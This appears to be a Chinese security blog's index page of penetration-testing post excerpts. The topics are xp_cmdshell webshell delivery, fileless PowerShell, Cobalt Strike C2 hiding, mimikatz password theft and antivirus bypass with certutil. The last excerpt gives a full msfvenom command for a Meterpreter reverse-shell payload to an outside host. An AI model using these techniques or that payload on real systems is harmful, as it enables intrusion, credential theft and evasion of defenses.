记一次Windows远程下载文件


PS. 吐了这火绒,只要一编辑该文章就提示木马病毒。 前言 测试过程中拿到了目标机器的数据库(sqlserver数据库)连接密码,通过Navicat连接上数据库后将xp_cmdshell扩展存储过程开启能够执行系统命令,遂想着通过执行命令将菜刀马远程下载下来并移动到Web目录,然后通过菜刀进行管理。

如何寻找IIS网站发布目录


需求分析 出现该问题的原因是有时候我们在测试过程中,无法找到服务器上面IIS中间件所发布网站的物理路径;所以引出该问题。 并且有时候可能会遇到一个服务器上面存在多个网站的情况,不容易判断各个网站对应的目录,这个时候也可以使用这种方法判断各网站对应的域名,绑定的端口,对应的网站物理路径等。 需求实现

Powershell实现无文件渗透【混淆】


介绍 该笔记是一年多以前记录的,偶然在电脑的一个txt文件里面发现了,顺带就整理了一下写在这里,偶尔可能也会用用。 切勿用于非法用途! 正常测试 使用该方式需要将生成的文件上传到目标上,如果目标上存在杀软的话,可能会导致文件被杀从而无法落地。 首先在cs上面随意生成一个exe,并在测试机器上测试能否

医院漏洞之[一毛钱挂号]


未经允许,禁止转载! 介绍 记录当时作为外援帮别人参加攻防演习时候,关于某医院的漏洞挖掘及提交,而且当时做外援带的人都是一群研究生,对外说好歹咱也是带过研究生的人(/狗头保命)。文中一切工作都是在有授权情况下进行,未授权进行测试属于违法行为,请自重! 流程介绍 关于医疗行业的漏洞,从个人多个测试经验

Axis1.4 RCE记录之二【JNDI注入】


介绍 太惨了,虽然本地实验成功证明该漏洞在工作中遇到是可以利用的,而且在工作中其实也是实际利用了,但是最终由于文件写上去后是个静态资源目录,所有恶意后缀不解析,然后网站的目录又没有猜到,导致到现在也没有成功,而且在公司也测试了第二种方法,虽然能收到服务器连接的请求,但是RCE始终没有成功 今天我胖虎

Cobalt Strike使用记录


介绍 平常使用Cobale Strike的一些记录,一些坑等。目前只是大致记录了下,还未记录实质内容。 还有就是cs文件的问题,在网上下载的cs自己也不会判断是否存在暗桩,也不会弄,而且下载的压缩包内文件也太多,所以我就把没用的文件都删了,留下必要的文件。客户端和服务端运行只需要下述的相关文件即可,

Cobalt Strike隐藏篇


开头 在网上查阅资料,目前Cobalt Strike的隐藏主要通过CDN和Nginx反代来实现,但是查阅了很多资料没有看见有将两者结合起来实现的情况,所以就想尝试一下,最开始确实失败了,但是后面瞎折腾,也还是实现了cloudflare cdn和Nginx反向代理两种方法相结合的方式使目标上线,所以这

Windows获取明文密码的常见方式


Windows获取明文密码 目前网络上已经有许多获取Windows系统明文密码的方式了,且都比较成熟,所以我这里写的和那些相比就属于小巫见大巫了。 这里主要将抓取明文密码,抓Hash方法也适用,包含但不限于下述这些方法。 直接使用mimikatz 第一种比较常见的就是直接使用mimikatz抓取目标

关于执行命令时被拦截的那档子事


关于执行命令时被拦截的那档子事 因为电脑就安装了火绒,所以就用火绒实验了,360之类的应该同理。 绕过拦截 虽然这个思路我早就有,但是一直没实验;今天恰巧下载文件太慢我试试用certutil命令下载,然后执行命令的时候被火绒弹窗拦截了。

PowerShell一些笔记


Powershell使用 msf生成后门: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8080 --arch x64 --platform windows -f psh-reflection -o test